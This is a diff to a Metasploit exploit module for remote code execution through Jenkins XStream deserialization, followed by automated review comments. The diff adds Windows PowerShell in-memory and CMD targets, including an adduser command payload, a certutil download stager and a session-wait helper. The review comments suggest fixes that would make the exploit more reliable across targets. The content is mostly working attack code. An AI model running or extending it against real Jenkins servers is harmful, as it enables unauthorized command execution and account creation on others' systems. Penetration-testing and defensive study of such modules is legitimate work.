diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
index f68ad258ed..4b6f3472c1 100644
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -43,6 +43,20 @@ class MetasploitModule < Msf::Exploit::Remote
 'Platform' => 'python',
 'Arch' => ARCH_PYTHON
 ],
+ ['PowerShell (In-Memory)',
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64]
+ ],
+ ['Windows (CMD)',
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_CMD],
+ 'Payload' => {
+ 'Compat' => {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'adduser, generic'
+ }
+ }
+ ],
 ['Linux (Dropper)',
 'Platform' => 'linux',
 'Arch' => [ARCH_X86, ARCH_X64]
@@ -57,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
 register_options([
 OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+ OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
 Opt::RPORT('8080')
 ])
 deregister_options('URIPATH')
@@ -82,23 +97,29 @@ class MetasploitModule < Msf::Exploit::Remote
 
 def exploit
 case target.name
- when /Unix/, /Python/
+ when /Unix/, /Python/, /CMD/
 execute_command(payload.encoded)
+ when /PowerShell/
+ execute_command(payload.encoded)
+ wait_for_session
 else
- execute_cmdstager
+ execute_cmdstager({:flavor => :certutil})
+ wait_for_session
 end
 end
 
 # Exploit methods
-
 def execute_command(cmd, opts = {})
 cmd = case target.name
 when /Unix/, /Linux/
 %W{/bin/sh -c #{cmd}}
 when /Python/
 %W{python -c #{cmd}}
- when /Windows/
+ when /Windows/, /CMD/
 %W{cmd.exe /c #{cmd}}
+ when /PowerShell/
+ psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
+ %W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
 end
 
 # Encode each command argument with XML entities
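Review bot: `PSH_PATH` is registered with an empty default in the options hunk, but nothing in this diff reads `datastore['PSH_PATH']` — the PowerShell branch of `execute_command` only hands `:remove_comspec` and `:wrap_double_quotes` to `cmd_psh_payload`. Unless the Powershell mixin consumes that datastore key by itself (not visible here), the option is dead and will mislead operators who set it. Either thread it into the `psh_opts` hash or drop the option; at minimum a one-line comment above the `OptString.new('PSH_PATH', ...)` line naming the code that reads it would resolve the question for the next reader.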
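Review bot: The `else` branch of `exploit` now hard-codes `execute_cmdstager({:flavor => :certutil})`, yet by the target list in the first hunk that branch is also where 'Linux (Dropper)' lands (its name matches none of `/Unix/`, `/Python/`, `/CMD/` or `/PowerShell/`), and certutil is a Windows-only stager flavor, so the Linux dropper target appears to lose the default flavor it had before this change. Selecting the flavor by target, e.g. `execute_cmdstager(target.name =~ /Windows/ ? {:flavor => :certutil} : {})`, keeps the Windows behavior the commit wants without breaking the Linux target. The `case` in `execute_command` still has no `else`, so any future target name that matches none of the branches silently yields `cmd = nil`; a `fail_with(Failure::NoTarget, ...)` default branch would make that explicit. `execute_command` continues past the end of this hunk.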
@@ -113,6 +134,20 @@ class MetasploitModule < Msf::Exploit::Remote
 )
 end
 
+ def wait_for_session
+ print_status "Waiting for exploit to complete..."
+ begin
+ Timeout.timeout(datastore['ListenerTimeout']) do
+ loop do
+ break if session_created?
+ Rex.sleep(0.25)
+ end
+ end
+ rescue ::Timeout::Error
+ fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
+ end
+ end
+
 def xstream_payload(cmd)
 <